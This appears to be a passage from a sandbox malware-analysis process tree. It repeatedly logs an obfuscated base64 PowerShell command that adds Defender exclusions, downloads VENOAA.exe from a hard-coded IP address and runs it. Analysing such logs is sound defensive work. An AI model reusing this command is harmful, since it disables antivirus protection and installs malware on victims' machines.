        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        212⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        213⤵
        Checks computer location settings
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        214⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        215⤵
        
        PID:1152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        216⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        217⤵
        Checks computer location settings
        
        PID:4944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        218⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        219⤵
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        220⤵
        
        PID:1496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        221⤵
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        221⤵
        Checks computer location settings
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        222⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        223⤵
        
        PID:4368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        224⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        225⤵
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        226⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        227⤵
        Checks computer location settings
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        228⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        229⤵
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        230⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        231⤵
        Checks computer location settings
        
        PID:732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        232⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        233⤵
        
        PID:3240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        234⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        235⤵
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        236⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        237⤵
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
